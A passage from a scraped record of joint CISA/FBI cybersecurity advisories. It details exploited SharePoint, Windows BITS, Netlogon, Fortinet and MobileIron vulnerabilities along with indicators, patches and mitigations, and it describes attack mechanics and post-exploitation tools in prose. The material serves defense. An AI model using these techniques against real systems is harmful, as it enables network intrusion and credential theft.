Remote Code Execution via Insecure Deserialization in Telerik UI](<https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui>)\n * [FBI FLASH: Indicators Associated with Netwalker Ransomware](<https://www.ic3.gov/Media/News/2020/200929-2.pdf>) \n \n_Table 13: CVE-2019-0604 Vulnerability Details_\n\nMicrosoft SharePoint Remote Code Execution (CVE-2019-0604) \n--- \n \n_**Vulnerability Description**_\n\nA vulnerability in an XML deserialization component within Microsoft SharePoint allowed remote attackers to execute arbitrary code on vulnerable Microsoft SharePoint servers.\n\n| \n\n**_CVSS 3.0_**\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nThis vulnerability was typically exploited to install webshell malware to vulnerable hosts. A webshell could be placed in any location served by the associated Internet Information Services (IIS) web server and did not require authentication. These web shells would commonly be installed in the Layouts folder within the Microsoft SharePoint installation directory, for example:\n\n`C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\<version_number>\\Template\\Layouts`\n\nThe `xmlSerializer.Deserialize()` method does not adequately sanitize user input that is received from the PickerEnitity/ValidateEnity (`picker.aspx`) functions in the serialized XML payloads. Once the serialized XML payload is deserialized, the XML code is evaulated for relevant XML commands and stings. A user can attack .Net based XML parsers with XMLNS payloads using the <`system:string`> tag and embedding malicious operating system commands. \n\n_The exploit was used in malware phishing and the WickrMe/Hello Ransomware campaigns._\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0604>) \n \n_**Recommended Mitigations**_\n\n * Upgrade on-premise installations of Microsoft Sharepoint to the latest available version (Microsoft SharePoint 2019) and patch level.\n * On-premise Microsoft SharePoint installations with a requirement to be accessed by internet-based remote staff should be moved behind an appropriate authentication mechanism such as a VPN, if possible. \n \n_**Detection Methods**_\n\n * The patch level of on-premise Microsoft SharePoint installations should be reviewed for the presence of relevant security updates as outlined in the Microsoft SharePoint security advisory.\n * Vulnerable SharePoint servers should be reviewed for evidence of attempted exploitation. [ACSC Advisory 2019-125](<https://www.cyber.gov.au/acsc/view-all-content/advisories/acsc-advisory-2019-125-targeting-microsoft-sharepoint-cve-2019-0604>) contains advice on reviewing IIS HTTP request logs for evidence of potential exploitation.\n * NSA provides guidance on [detecting and preventing web shell malware](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>). \n \n_**Vulnerable Technologies and Versions**_\n\nAt the time of the vulnerability release, the following Microsoft SharePoint versions were affected: Microsoft Sharepoint 2019, Microsoft SharePoint 2016, Microsoft SharePoint 2013 SP1, and Microsoft SharePoint 2010 SP2. \n \n_**References**_\n\n * [Microsoft \u2013 SharePoint Remote Code Execution Vulnerability Security Advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0604>)\n * [NIST NVD Vulnerability Detail: CVE-2019-0604](<https://nvd.nist.gov/vuln/detail/cve-2019-0604>)\n * [ACSC Advisory 2019-125: Targeting of Microsoft SharePoint CVE-2019-0604](<https://www.cyber.gov.au/acsc/view-all-content/advisories/acsc-advisory-2019-125-targeting-microsoft-sharepoint-cve-2019-0604>)\n * [NSCS Alert: Microsoft SharePoint Remote Code Vulnerability](<https://www.ncsc.gov.uk/news/alert-microsoft-sharepoint-remote-code-vulnerability>) \n \n_Table 14: CVE-2020-0787 Vulnerability Details_\n\nWindows Background Intelligent Transfer Service Elevation of Privilege (CVE-2020-0787) \n--- \n \n_**Vulnerability Description**_\n\nThe Windows Background Intelligent Transfer Service (BITS) is vulnerable to a privilege elevation vulnerability if it improperly handles symbolic links. An actor can exploit this vulnerability to execute arbitrary code with system-level privileges.\n\n| \n\n_**CVSS 3.0**_\n\nHigh \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nTo exploit this vulnerability, an actor would first need to have the ability to execute arbitrary code on a vulnerable Windows host.\n\nActors exploiting this vulnerability commonly used the proof of concept code released by the security researcher who discovered the vulnerability. If an actor left the proof of concept exploit\u2019s working directories unchanged, then the presence of the following folders could be used as an indicator of exploitation:\n\n`C:\\Users\\<username>\\AppData\\Local\\Temp\\workspace \nC:\\Users\\<username>\\AppData\\Local\\Temp\\workspace\\mountpoint \nC:\\Users\\<username>\\AppData\\Local\\Temp\\workspace\\bait`\n\n_The exploit was used in Maze and Egregor ransomware campaigns._\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0787>) \n \n_**Recommended Mitigations**_\n\n * Apply the security updates as recommended in the Microsoft Netlogon security advisory. \n \n_**Detection Methods**_\n\n * The patch level of all Microsoft Windows installations should be reviewed for the presence of relevant security updates as outlined in the Microsoft BITS security advisory. \n \n_**Vulnerable Technologies and Versions**_\n\nWindows 7 for 32-bit and x64-based Systems Service Pack 1, 8.1 for 32-bit and x64-based systems, RT 8.1, 10 for 32-bit and x64-based Systems, 10 1607 for 32-bit and x64-based Systems, 10 1709 for 32-bit and x64-based and ARM64-based Systems, 10 1803 for 32-bit and ARM64-based and x64-based Systems, 10 1809 for 32-bit and ARM64-based and x64-based Systems, 10 1903 for 32-bit and ARM64-based and x64-based Systems, 10 1909 for 32-bit, and ARM64-based and x64-based Systems are vulnerable.\n\nWindows Server 2008 R2 for x64-based Systems Service Pack 1, 2008 R2 for x64-based Systems Service Pack 1 (Server Core Installation), 2008 for 32-bit Systems Service Pack 2, 2008 for 32-bit Systems Service Pack 2 (Server Core Installation), 2012, 2012 (Server Core Installation), 2012 R2, 2012 R2 (Server Core Installation), 2016, 2016 (Server Core Installation), 2019, 2019 (Server Core Installation), 1803 (Server Core Installation), 1903 (Server Core Installation), and 1909 (Server Core Installation) are also vulnerable. \n \n_**References**_\n\n * [Microsoft \u2013 Windows Background Intelligent Transfer Service Elevation of Privilege Security Advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0787>)\n * [NIST NVD Vulnerability Detail: CVE-2020-0787](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>)\n * [Security Researcher \u2013 Proof of Concept Exploit Code](<https://itm4n.github.io/cve-2020-0787-windows-bits-eop/>) \n \n_Table 15: CVE-2020-1472 Vulnerability Details_\n\nMicrosoft Netlogon Elevation of Privilege (CVE-2020-1472) \n--- \n \n_**Vulnerability Description**_\n\nThe Microsoft Windows Netlogon Remote Protocol (MS-NRPC) reuses a known, static, zero-value initialization vector (VI) in AES-CFB8 mode, which could allow an unauthenticated attacker to impersonate a domain-joined computer including a domain controller, and potentially obtain domain administrator privileges.\n\n| \n\n_**CVSS 3.0**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nTo exploit this vulnerability, an actor would first need to have an existing presence on an internal network with network connectivity to a vulnerable Domain Controller, assuming that Domain Controllers are not exposed to the internet.\n\nThe immediate effect of successful exploitation results in the ability to authentication to the vulnerable Domain Controller with Domain Administrator level credentials. In compromises exploiting this vulnerability, exploitation was typically followed immediately by dumping all hashes for Domain accounts.\n\nThreat actors were seen combining the MobileIron CVE-2020-15505 vulnerability for initial access, then using the Netlogon vulnerability to facilitate lateral movement and further compromise of target networks.\n\n_A nation-state APT group has been observed exploiting this vulnerability_.[[18](<https://www.cyber.nj.gov/alerts-advisories/apt10-adds-zerologon-exploitation-to-ttps>)]\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>) \n \n_**Recommended Mitigations**_\n\n * Apply the security updates as recommended in the Microsoft Netlogon security advisory. \n \n_**Detection Methods**_\n\n * The patch level of Domain Controllers should be reviewed for the presence of relevant security updates as outlined in the Microsoft Netlogon security advisory.\n * Reviewing and monitoring Windows Event Logs can identify potential exploitation attempts. However, further investigation would still be required to eliminate legitimate activity. Further information on these event logs is available in the [ACSC 2020-016 Advisory](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472>). \n \n_**Vulnerable Technologies and Versions**_\n\nAt the time of the vulnerability release, the following Microsoft Windows Server versions were vulnerable: all versions of Windows Server 2019; all versions of Windows Server 2016; Windows Server 2012 R2; Windows Server 2012; Windows Server 2008 R2 SP1; and Windows Server versions 1909/1903/1809. \n \n_**References**_\n\n * [Microsoft \u2013 Netlogon Elevation of Privilege Vulnerability](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>)\n * [NIST NVD Vulnerability Detail: CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/cve-2020-1472>)\n * [ACSC 2020-016 Netlogon Advisory](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472>)\n * [CISA-FBI Joint Cybersecurity Advisory: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>)\n * [CISA-FBI Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n * [ACSC Advisory 2020-016: \"Zerologon\" \u2013 Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472>)\n * [NCSC Alert: UK Organisations Should Patch Netlogon Vulnerability (Zerologon)](<https://www.ncsc.gov.uk/news/alert-organisations-should-patch-netlogon-vulnerability>) \n \nFor additional general best practices for mitigating cyber threats, see the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) and ACSC\u2019s [Essential Eight](<https://www.cyber.gov.au/acsc/view-all-content/essential-eight>) mitigation strategies.\n\n### Additional Resources\n\n#### Free Cybersecurity Services\n\nCISA offers several free cyber hygiene vulnerability scanning and web application services to help U.S. federal agencies, state and local governments, critical infrastructure, and private organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. For more information about [CISA\u2019s free services](<https://www.cisa.gov/cyber-hygiene-services>), or to sign up, email [vulnerability_info@cisa.dhs.gov](<mailto:vulnerability_info@cisa.dhs.gov>).\n\n#### Cyber Essentials\n\n[CISA\u2019s Cyber Essentials](<https://www.cisa.gov/cyber-essentials>) is a guide for leaders of small businesses as well as leaders of small and local government agencies to develop an actionable understanding of where to start implementing organizational cybersecurity practices.\n\n#### Cyber.gov.au \n\n[ACSC\u2019s website](<https://www.cyber.gov.au/>) provides advice and information about how to protect individuals and families, small- and medium-sized businesses, large organizations and infrastructure, and government organizations from cyber threats.\n\n#### ACSC Partnership Program\n\nThe ACSC Partnership Program enables Australian organizations and individuals to engage with ACSC and fellow partners, drawing on collective understanding, experience, skills, and capability to lift cyber resilience across the Australian economy.\n\nAustralian organizations, including government and those in the private sector as well individuals, are welcome to sign up at [Become an ACSC partner](<https://www.cyber.gov.au/partner-hub/become-a-partner>) to join.\n\n#### NCSC 10 Steps\n\nThe NCSC offers [10 Steps to Cyber Security](<https://urldefense.us/v3/__https:/www.ncsc.gov.uk/collection/10-steps__;!!BClRuOV5cvtbuNI!T8Z-cMwGes9PcbBL1utGkQdFFUBjxNk7elZg1ioCK-eU1tUQokVWKONDFlwSGb1kHLNs74-CWWI8Rbcz%24>), providing detailed guidance on how medium and large organizations can manage their security.\n\nOn vulnerabilities specifically, the NCSC has [guidance to organizations on establishing an effective vulnerability management process](<https://urldefense.us/v3/__https:/www.ncsc.gov.uk/guidance/vulnerability-management__;!!BClRuOV5cvtbuNI!T8Z-cMwGes9PcbBL1utGkQdFFUBjxNk7elZg1ioCK-eU1tUQokVWKONDFlwSGb1kHLNs74-CWfrZnnW4%24>), focusing on the management of widely available software and hardware.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at[ www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. If you have any further questions related to this Joint Cybersecurity Advisory, or to request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.gov](<mailto:Central@cisa.gov>).\n\n### References\n\n[[1] NSA-CISA-FBI Cybersecurity Advisory: Russian SVR Targets U.S. and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>)\n\n[[2] CISA-FBI-NSA-NCSC Advisory: Further TTPs Associated with SVR Cyber Actors](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/07/joint-ncsc-cisa-fbi-nsa-cybersecurity-advisory-russian-svr>)\n\n[[3] NSA Cybersecurity Advisory: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)\n\n[[4] ACSC Advisory 2020-001-4: Remediation for Critical Vulnerability in Citrix Application Delivery Controller and Citrix Gateway](<https://www.cyber.gov.au/acsc/view-all-content/advisories/2020-001-4-remediation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway>)\n\n[[5] NCSC Alert: Actors Exploiting Citrix Products Vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[6] Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n\n[[7] CISA-FBI Joint Cybersecurity Advisory: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[8] ACSC Alert: APT Exploitation of Fortinet Vulnerabilities](<https://www.cyber.gov.au/acsc/view-all-content/alerts/apt-exploitation-fortinet-vulnerabilities>)\n\n[[9] NCSC Alert: Alert: Critical Risk to Unpatched Fortinet VPN Devices](<https://www.ncsc.gov.uk/news/critical-risk-unpatched-fortinet-vpn-devices>)\n\n[[10] NSA Cybersecurity Advisory: Mitigating Recent VPN Vulnerabilities](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating%20Recent%20VPN%20Vulnerabilities%20-%20Copy.pdf>)\n\n[[11] NCSC Alert: Vulnerabilities Exploited in VPN Products Used Worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n[[12] NCSC-Canada\u2019s Communications Security Establishment-NSA-CISA Advisory: APT29 Targets COVID-19 Vaccine Development (CSE)](<https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF>)\n\n[[13] ACSC Advisory: Summary of Tactics, Techniques and Procedures Used to Target Australian Networks](<https://www.cyber.gov.au/acsc/view-all-content/advisories/summary-tactics-techniques-and-procedures-used-target-australian-networks>)\n\n[[14] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)\n\n[[15] CISA Alert: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)\n\n[[16] CISA Emergency Directive (ED 20-03): Windows DNS Server Vulnerability](<https://www.cisa.gov/blog/2020/07/16/emergency-directive-ed-20-03-windows-dns-server-vulnerability>)\n\n[[17] NCSC Alert: Alert: Multiple Actors are Attempting to Exploit MobileIron Vulnerability CVE 2020-15505](<https://www.ncsc.gov.uk/news/alert-multiple-actors-attempt-exploit-mobileiron-vulnerability>)\n\n[[18] NJCCIC Alert: APT10 Adds ZeroLogon Exploitation to TTPs](<https://www.cyber.nj.gov/alerts-advisories/apt10-adds-zerologon-exploitation-to-ttps>)\n\n### Revisions\n\nInitial Version: July 28, 2021|August 4, 2021: Fixed typo|August 20, 2021: Adjusted vendor name for CVE-2020-1472\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-20T12:00:00", "type": "ics", "title": "Top Routinely Exploited Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2023-27350"], "modified": "2021-08-20T12:00:00", "id": "AA21-209A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-209a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T16:34:38", "description": "### Summary\n\n_This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\n**Note:** the analysis in this joint cybersecurity advisory is ongoing, and the information provided should not be considered comprehensive. The Cybersecurity and Infrastructure Security Agency (CISA) will update this advisory as new information is available.\n\nThis joint cybersecurity advisory was written by CISA with contributions from the Federal Bureau of Investigation (FBI). \n\nCISA has recently observed advanced persistent threat (APT) actors exploiting multiple legacy vulnerabilities in combination with a newer privilege escalation vulnerability\u2014[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)\u2014in Windows Netlogon. The commonly used tactic, known as vulnerability chaining, exploits multiple vulnerabilities in the course of a single intrusion to compromise a network or application. \n\nThis recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal, and territorial (SLTT) government networks. Although it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.\n\nCISA is aware of some instances where this activity resulted in unauthorized access to elections support systems; however, CISA has no evidence to date that integrity of elections data has been compromised. There are steps that election officials, their supporting SLTT IT staff, and vendors can take to help defend against this malicious cyber activity.\n\nSome common tactics, techniques, and procedures (TTPs) used by APT actors include leveraging legacy network access and virtual private network (VPN) vulnerabilities in association with the recent critical [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon vulnerability. CISA is aware of multiple cases where the Fortinet FortiOS Secure Socket Layer (SSL) VPN vulnerability [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) has been exploited to gain access to networks. To a lesser extent, CISA has also observed threat actors exploiting the MobileIron vulnerability [CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>). While these exploits have been observed recently, this activity is ongoing and still unfolding.\n\nAfter gaining initial access, the actors exploit [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) to compromise all Active Directory (AD) identity services. Actors have then been observed using legitimate remote access tools, such as VPN and Remote Desktop Protocol (RDP), to access the environment with the compromised credentials. Observed activity targets multiple sectors and is not limited to SLTT entities.\n\nCISA recommends network staff and administrators review internet-facing infrastructure for these and similar vulnerabilities that have or could be exploited to a similar effect, including Juniper [CVE-2020-1631](<https://nvd.nist.gov/vuln/detail/CVE-2020-1631>), Pulse Secure [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), Citrix NetScaler [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and Palo Alto Networks [CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>) (this list is not considered exhaustive).\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n### Initial Access\n\nAPT threat actors are actively leveraging legacy vulnerabilities in internet-facing infrastructure (_Exploit Public-Facing Application_ [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190/>)], _External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133/>)]) to gain initial access into systems. The APT actors appear to have predominately gained initial access via the Fortinet FortiOS VPN vulnerability [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>).\n\nAlthough not observed in this campaign, other vulnerabilities, listed below, could be used to gain network access (as analysis is evolving, these listed vulnerabilities should not be considered comprehensive). As a best practice, it is critical to patch all known vulnerabilities within internet-facing infrastructure.\n\n * Citrix NetScaler [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n * MobileIron [CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)\n * Pulse Secure [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n * Palo Alto Networks [CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)\n * F5 BIG-IP [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n\n#### Fortinet FortiOS SSL VPN CVE-2018-13379\n\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) is a path traversal vulnerability in the FortiOS SSL VPN web portal. An unauthenticated attacker could exploit this vulnerability to download FortiOS system files through specially crafted HTTP resource requests.[[1](<https://www.fortiguard.com/psirt/FG-IR-18-384>)]\n\n### MobileIron Core & Connector Vulnerability CVE-2020-15505\n\n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) is a remote code execution vulnerability in MobileIron Core & Connector versions 10.3 and earlier.[[2](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)] This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.\n\n### Privilege Escalation\n\nPost initial access, the APT actors use multiple techniques to expand access to the environment. The actors are leveraging [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) in Windows Netlogon to escalate privileges and obtain access to Windows AD servers. Actors are also leveraging the opensource tools such as Mimikatz and the CrackMapExec tool to obtain valid account credentials from AD servers (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078/>)]).\n\n#### Microsoft Netlogon Remote Protocol Vulnerability: CVE-2020-1472\n\n[CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) is a vulnerability in Microsoft Windows Netlogon Remote Protocol (MS-NRPC), a core authentication component of Active Directory.[[3](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)] This vulnerability could allow an unauthenticated attacker with network access to a domain controller to completely compromise all AD identity services (_Valid Accounts: Domain Accounts_ [[T1078.002](<https://attack.mitre.org/versions/v7/techniques/T1078/002/>)]). Malicious actors can leverage this vulnerability to compromise other devices on the network (_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v7/tactics/TA0008/>)]).\n\n### Persistence\n\nOnce system access has been achieved, the APT actors use abuse of legitimate credentials (_Valid Accounts _[[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078/>)]) to log in via VPN or remote access services _(External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133/>)]) to maintain persistence.\n\n### Mitigations\n\nOrganizations with externally facing infrastructure devices that have the vulnerabilities listed in this joint cybersecurity advisory, or other vulnerabilities, should move forward with an \u201cassume breach\u201d mentality. As initial exploitation and escalation may be the only observable exploitation activity, most mitigations will need to focus on more traditional network hygiene and user management activities.\n\n### Keep Systems Up to Date\n\nPatch systems and equipment promptly and diligently. Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. See table 1 for patch information on CVEs mentioned in this report.\n\n_Table 1: Patch information for CVEs_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | \n\n * FortiOS 6.0: 6.0.0 to 6.0.4\n * FortiOS 5.6: 5.6.3 to 5.6.7\n * FortiOS 5.4: 5.4.6 to 5.4.12\n| \n\n * [Fortinet Security Advisory: FG-IR-18-384](<https://www.fortiguard.com/psirt/FG-IR-18-384>) \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | \n\n * Citrix Application Delivery Controller\n * Citrix Gateway\n * Citrix SDWAN WANOP\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 ](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) | \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) | \n\n * MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0 \n * Sentry versions 9.7.2 and earlier, and 9.8.0; \n * Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier\n| \n\n * [MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>) \n[CVE-2020-1631](<https://nvd.nist.gov/vuln/detail/CVE-2020-1631>) | \n\n * Junos OS 12.3, 12.3X48, 14.1X53, 15.1, 15.1X49, 15.1X53, 17.2, 17.3, 17.4, 18.1, 18.2, 18.3, 18.4, 19.1, 19.2, 19.3, 19.4, 20.1\n| \n\n * [Juniper Security Advisory JSA11021](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11021>) \n[CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>) | \n\n * PAN-OS 9.1 versions earlier than PAN-OS 9.1.3; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15, and all versions of PAN-OS 8.0 (EOL)\n| \n\n * [Palo Alto Networks Security Advisory for CVE-2020-2021](<https://security.paloaltonetworks.com/CVE-2020-2021>) \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2016\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) \n \n### Comprehensive Account Resets\n\nIf there is an observation of 